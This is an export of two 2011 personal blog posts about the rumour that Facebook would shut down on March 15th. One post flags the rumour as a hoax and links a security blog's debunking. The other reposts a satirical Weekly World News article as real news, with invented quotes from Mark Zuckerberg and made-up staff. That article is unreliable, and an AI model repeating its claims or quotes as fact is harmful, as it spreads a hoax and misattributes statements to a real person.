</u></span></div><div><span class="Apple-style-span" style="font-size: small;"><u><span class="Apple-style-span" style="-webkit-text-decorations-in-effect: none; font-size: 16px;"><div style="background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #333333; font-family: arial, helvetica, sans-serif; font-size: 15px; line-height: normal; margin-bottom: 10px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"><i><b>Heard a story that Facebook is going to end on March 15th? You should take it with a pinch of salt.</b></i></div><div style="background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #333333; font-family: arial, helvetica, sans-serif; font-size: 15px; line-height: normal; margin-bottom: 10px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"><i><b>A story is spreading like wildfire across Facebook this weekend, claiming that the world's most popular social network is closing on March 15th.</b></i></div><div style="background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #333333; font-family: arial, helvetica, sans-serif; font-size: 15px; line-height: normal; margin-bottom: 10px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"><i><b>The reason? CEO Mark Zuckerberg claims that "managing [Facebook] has ruined my life. I need to put an end to all the madness." </b></i></div><div style="background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #333333; font-family: arial, helvetica, sans-serif; font-size: 15px; line-height: normal; margin-bottom: 10px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"><i><b>have a more look on neWs here : <span class="Apple-style-span" style="-webkit-text-decorations-in-effect: none; font-size: small; font-style: normal; font-weight: normal; line-height: 16px;"><u><span class="Apple-style-span" style="-webkit-text-decorations-in-effect: none; font-size: 16px;"><a href="http://nakedsecurity.sophos.com/2011/01/09/facebook-will-not-end-on-march-15th-hoax-news-story-spreads-like-wildfire/">http://nakedsecurity.sophos.com/2011/01/09/facebook-will-not-end-on-march-15th-hoax-news-story-spreads-like-wildfire/</a></span></u></span></b></i></div></span></u></span></div>deadbjhttp://www.blogger.com/profile/07668877947934556480noreply@blogger.com0tag:blogger.com,1999:blog-4622788998166863521.post-70145625219576640662011-01-09T05:03:00.000-08:002011-01-09T05:03:20.629-08:00FACEBOOK WILL END ON MARCH 15th!FACEBOOK WILL END ON MARCH 15th! <br />
'PuncH to TheWeB HistorY...'- BIJAY<br />
<br />
<b><u>"REASON MAYBE ANYTHING BUT CLOSING FB WILL BE A MUCH DISABLENESS TO MUCH AND MORE. LET'S HOPE SOMONE ELSE WILL TAKE THE LEADERSHIP AND GIVES THE CONTINUATION TO FB.</u></b><br />
<b><u>HOPE SO"-BIJAY ACHARYA<a href="http://shenanigans-nepal.blogspot.com/"><SHENANIGANS-NEPAL.BLOGSPOT.COM></a></u></b><br />
<br />
Reason of EndiNg FB maY be:<br />
1>mark got better placement<br />
2>may be hackers cause<br />
3>may be googleme shock.<br />
4>may be facebook is misused<br />
5>may be he is afraid of being going his status down after this success.<br />
<br />
PALO ALTO, CA –Mark Zuckerberg announced that Facebook will be shut down in March. Managing the site has become too stressful.<span id="more-27321"></span><br />
“Facebook has gotten out of control,” said Zuckerberg in a press conference outside his Palo Alto office, “and the stress of managing this company has ruined my life. I need to put an end to all the madness.”<br />
Zuckerberg went on to explain that starting March 15th, users will no longer be able to access their Facebook accounts.<br />
“After March 15th the whole website shuts down,” said Avrat Humarthi, Vice President of Technical Affairs at Facebook. “So if you ever want to see your pictures again, I recommend you take them off the internet. You won’t be able to get them back once Facebook goes out of business.”<br />
Zuckerberg said that the decision to shut down Facebook was difficult, but that he does not think people will be upset.<br />
“I personally don’t think it’s a big deal,” he said in a private phone interview. “And to be honest, I think it’s for the better. Without Facebook, people will have to go outside and make real friends. That’s always a good thing.”<br />
Some Facebook users were furious upon hearing the shocking news.<br />
“What am I going to do without Facebook?” said Denise Bradshaw, a high school student from Indiana. “My life revolves around it. I’m on Facebook at least 10 hours a day. Now what am I going to do with all that free time?”<br />
However, parents across the country have been experiencing a long anticipated sense of relief.<br />
“I’m glad the Facebook nightmare is over,” said Jon Guttari, a single parent from Detroit. “Now my teenager’s face won’t be glued to a computer screen all day. Maybe I can even have a conversation with her.”<br />
Those in the financial circuit are criticizing Zuckerberg for walking away from a multibillion dollar franchise. Facebook is currently ranked as one of the wealthiest businesses in the world, with economists estimating its value at around 7.9 billion.<br />
But Zuckerberg remains unruffled by these accusations. He says he will stand by his decision to give Facebook the axe.<br />
“I don’t care about the money,” said Zuckerberg. “I just want my old life back.”<br />
The Facebook Corporation suggests that users remove all of their personal information from the website before March 15th. After that date, all photos, notes, links, and videos will be permanently erased.<br />
<br />
<b><u>"REASON MAYBE ANYTHING BUT CLOSING FB WILL BE A MUCH DISABLENESS TO MUCH AND MORE. LET'S HOPE SOMONE ELSE WILL TAKE THE LEADERSHIP AND GIVES THE CONTINUATION TO FB.</u></b><br />
<b><u>HOPE SO"-BIJAY ACHARYA<a href="http://shenanigans-nepal.blogspot.com/"><SHENANIGANS-NEPAL.BLOGSPOT.COM></a></u></b><br />
<br />
news was published in <a href="http://weeklyworldnews.com/headlines/27321/facebook-will-end-on-march-15th/">http://weeklyworldnews.com/headlines/27321/facebook-will-end-on-march-15th/ </a>on saturday.deadbjhttp://www.blogger.com/profile/07668877947934556480noreply@blogger.com0